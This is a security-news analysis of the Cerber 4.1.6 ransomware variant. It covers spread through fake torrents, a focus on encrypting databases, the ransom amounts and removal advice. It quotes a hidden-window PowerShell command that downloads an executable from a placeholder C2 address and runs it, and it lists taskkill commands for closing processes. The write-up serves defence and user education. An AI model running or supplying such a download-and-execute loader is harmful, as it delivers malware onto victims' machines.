Cerber 4.1.6 Ransomware - Remove Virus and Restore Encrypted Files - How to, Technology and PC Security Forum | SensorsTechForum.com

Cerber 4.1.6 Ransomware – Remove Virus and Restore Encrypted Files

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)

cerber-4-1-6-ransomware-infections-sensorstechforumAnd just when we thought the Cerber variants of its 4th version were over, the main competitors of Locky ransomware have surpised us with 4.1.6 iteration. The version does not include major improvements, but a new wallpaper as well as new distribution websites featured. Another new improvement in this version is that Cerber 4.1.6 is now more focused on encrypting databases, due to their higher importance for organizations, in case an enterprise computer is infected. After the 4.1.6 version of Cerber ransomware infects your computer, the virus immediately renders the files encrypted using a strong encryption algorithm. This is done with the purpose to get users to visit a web page promoting a Cerber decryptor for a payment in BitCoin in return for the decryption keys for the encrypted files uniquely generated for the specific infection. In case you have become a victim by this new form of online extortion. We advise you to be very cautious in your future moves and read this article.

Threat Summary


Cerber 4.1.6

Short DescriptionThe malware encrypts users files using a strong encryption algorithm, making direct decryption possible only via a unique decryption key available to the cyber-criminals.
SymptomsThe user may witness ransom notes and “instructions” linking to a web page and a decryptor. Changed file names and random file-extension has been used.
Distribution MethodVia an Exploit kit, Dll file attack, malicious JavaScript or a drive-by download of the malware itself in an obfuscated manner.
Detection Tool See If Your System Has Been Affected by Cerber 4.1.6


Malware Removal Tool

User ExperienceJoin our forum to Discuss Cerber 4.1.6.
Data Recovery ToolWindows Data Recovery by Stellar Phoenix Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.

Cerber 4.1.6 – What Is New

New Infection Strategy

When we take a look at the version 4 of Cerber ransomware, most of its sub versions (4.1.0, 4.1.1, 4.1.3, 4.1.4, 4.1.5) use e-mails and spam of malicious URLs on websites and other places to distribute and infect unsuspecting users. The 4.1.6 iteration of Cerber, however may have undertaken a different approach when it comes to infection, combining all types of distribution techniques together. Below, from the first Cerber detections, we see a sample which uses a fake portable Firefox web browser executable to cause an infection:


This strategy is very clever and torrent engines may be used to distribute it. Hackers go as far as even hacking accounts of 5 star uploaders on torrent websites to upload torrents that only pretend to be legitimate software but may in fact slither the 4.1.6 as well as the other versions of Cerber. This is because the network of Cerber ransomware is used as RaaS(Ransowmare as a service) and there are a lot of different individuals who are distributing the ransomware via different type of spam campaigns.

Cerber 4.1.6 Now More Focused on Databases

Since databases are mainly very important for organizations, Cerber was recently reported by researchers to be focused on attacking more and more forms of databases that exist out there. The primary reason for this is that the cyber-criminals generate a lot of profit by encrypting files of higher importance. Not only this but the 4.1.6 version may execute a batch (.bat) file that will immediately close the database process in case it is running in order to encode the database. Here are some examples, provided by Microsoft of the taskkill command’s uses, Cerber 4.1.6 may undertake:

→ taskkill /pid 1230 /pid 1241 /pid 1253
taskkill /f /fi “USERNAME eq NT AUTHORITY\SYSTEM” /im notepad.exe
taskkill /s srvmain /f /im notepad.exe
taskkill /s srvmain /u maindom\hiropln /p p@ssW23 /fi “IMAGENAME eq note*” /im *
taskkill /s srvmain /u maindom\hiropln /fi “USERNAME ne NT*” /im *
taskkill /f /fi “PID ge 1000” /im *

Further research also suggests that the 4.16 iteration of Cerber may target the following types of databases:

  • Microsoft Access.
  • Oracle.
  • MySQL.

Unlike other ransomware viruses that primarily focus on targeting pictures, documents, videos and audio files, the Cerber family of viruses is primarily focused on targeting databases now.

How Does Cerber 4.1.6 Work

Similar to the other versions of the ransomware, once its malicious file has been executed on the user’s computer, it uses obfuscation to avoid detection by any antivirus programs. This is performed by a powershell command allowing the concealed download and starting of a malicious process, most likely located in the %AppData% directory:

→PS C:\Users\{Username}> POWERSHELL.EXE –window hidden (New-Object System.net.WebClient).DownloadFile(‘http://{malicious cerber c2 ip}~trevor/winx64.exe’,”$env:APPDATA\winx64.exe);Start-Process (“$env:APPDATA\winx64.exe”)

After the malicious executable is download and launched it may tamper with key registry sub-keys and add custom registry values in them to cause the encryption process to be uninterrupted and quiet and make Cerber 4.1.6 assume control of the components it needs for it to perform.


After the encryption process has been finished, the 4.1.6 version drops a “readme.hta”(HTML) ransom note file and changes the wallpaper to the traditional Cebrer screen:


The note and the wallpaper both point out the Cerber Decryptor web page, which explains the situation to the victim:


What is different here is that this version of Cerber demands a significantly higher payment amount then the previous iterations – If $499 USD in BTC is not paid in time, the price for the decryption of the files increases to $999.

Cerber 4.1.6 – What to Do If I am Infected

In case you have become an unfortunate victim of this variant of Cerber, we strongly advise you to use the option on the ransom web page to decrypt one file for free:


Since paying the ransom is strongly not recommended , experts advise that you should backup the encrypted files on an external drive and instead of paying the ransom remove the virus using the information from the removal instructions below. For maximum effectiveness we advise you to take into consideration removing Cerber automatically with an anti-malware software.

After you have removed Cerber, we advise you to attempt alternative methods to restore your files such as the ones which are posted in step “2. Restore files encrypted by Cerber 4.1.6” below. They may not be 100% a solution, but they are a good temporary alternatives until malware researchers come up with a decryptor, just like what happened with the first version of Cerber last year. We will update this article with more information and a link to a decryptor as soon as it becomes available and this is why we advise you to check this web page regularly.


Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having graduated Marketing as well, Ventsislav also has passion for discovery of new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion within cybersecrurity and is a strong believer in basic education of every user towards online safety.

More Posts - Website

Follow Me:

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share